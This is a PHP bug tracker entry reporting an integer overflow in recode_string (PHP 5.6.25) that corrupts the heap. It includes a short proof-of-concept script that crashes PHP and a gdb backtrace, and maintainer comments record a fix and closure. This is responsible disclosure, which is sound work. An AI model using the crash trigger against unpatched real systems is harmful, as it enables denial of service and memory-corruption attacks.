php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #73016 integer overflow in recode_string caused heap corruption
Submitted: 2016-09-05 02:12 UTC Modified: 2017-02-13 01:25 UTC
From: minhrau dot vc dot 365 at gmail dot com Assigned: stas (profile)
Status: Closed Package: Recode related
PHP Version: 5.6.25 OS: ALL
Private report: No CVE-ID: None
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: minhrau dot vc dot 365 at gmail dot com
New email:
PHP Version: OS:

 

 [2016-09-05 02:12 UTC] minhrau dot vc dot 365 at gmail dot com 
Description:
------------
Integer overflow in function recode_string lead to heap corruption. Please check comment below:

PHP_FUNCTION(recode_string)
{
	RECODE_REQUEST request = NULL;
	char *r = NULL;
	size_t r_len = 0, r_alen = 0;
	int req_len, str_len;
	char *req, *str;
...
	
	recode_buffer_to_buffer(request, str, str_len, &r, &r_len, &r_alen); //this function create return buffer with length > INT_MAX
...
	} else {
		RETVAL_STRINGL(r, r_len, 1); 
		free(r);
	}

	recode_delete_request(request);

	return;
}

Test script:
---------------
<?php

ini_set('memory_limit', -1);

$str = str_repeat('>', 0xffffffff/6);

var_dump(strlen($str));

$str1 = recode_string("utf-8..html", $str);

var_dump(strlen($str1));
chunk_split($str1, 11, $str1);
?>



Expected result:
----------------
No Crash

Actual result:
--------------
Starting program: /home/minhrau/PHP-5.6.25/sapi/cli/php ~/phptestcase/testrecode.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
int(715827882)
int(-1431655768)

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff11ff9a4 in __memmove_avx_unaligned_erms () from /usr/lib/libc.so.6
(gdb) bt
#0  0x00007ffff11ff9a4 in __memmove_avx_unaligned_erms () from /usr/lib/libc.so.6
#1  0x000000000084a05d in zif_chunk_split (ht=3, return_value=0x7ffff7fa1ec0, return_value_ptr=0x7ffff7f6c0d8, this_ptr=0x0, return_value_used=0) at /home/minhrau/PHP-5.6.25/ext/standard/string.c:2218
#2  0x00000000009ba153 in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7f6c270) at /home/minhrau/PHP-5.6.25/Zend/zend_vm_execute.h:558
#3  0x00000000009c1d83 in ZEND_DO_FCALL_SPEC_CONST_HANDLER (execute_data=0x7ffff7f6c270) at /home/minhrau/PHP-5.6.25/Zend/zend_vm_execute.h:2602
#4  0x00000000009b8646 in execute_ex (execute_data=0x7ffff7f6c270) at /home/minhrau/PHP-5.6.25/Zend/zend_vm_execute.h:363
#5  0x00000000009b9032 in zend_execute (op_array=0x7ffff7fa08d8) at /home/minhrau/PHP-5.6.25/Zend/zend_vm_execute.h:388
#6  0x0000000000974532 in zend_execute_scripts (type=8, retval=0x0, file_count=3) at /home/minhrau/PHP-5.6.25/Zend/zend.c:1341
#7  0x00000000008e548e in php_execute_script (primary_file=0x7fffffffe290) at /home/minhrau/PHP-5.6.25/main/main.c:2613
#8  0x0000000000a972b4 in do_cli (argc=2, argv=0x136a960) at /home/minhrau/PHP-5.6.25/sapi/cli/php_cli.c:994
#9  0x0000000000a98302 in main (argc=2, argv=0x136a960) at /home/minhrau/PHP-5.6.25/sapi/cli/php_cli.c:1378
(gdb)

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-09-05 05:22 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-09-05 05:22 UTC] stas@php.net 
The fix is in security repo as aec5ab899f9de6cf11ded9c77b649b34f5fcb643 and in https://gist.github.com/ba06b796489e3c50924f2bb3c99012b0

please verify
 [2016-09-05 05:26 UTC] minhrau dot vc dot 365 at gmail dot com 
Patch looks good.

can i request cve for this?
 [2016-09-13 04:12 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-09-13 04:12 UTC] stas@php.net 
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.
 [2017-02-13 01:25 UTC] stas@php.net
-Type: Security +Type: Bug
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Mon Dec 30 17:01:29 2024 UTC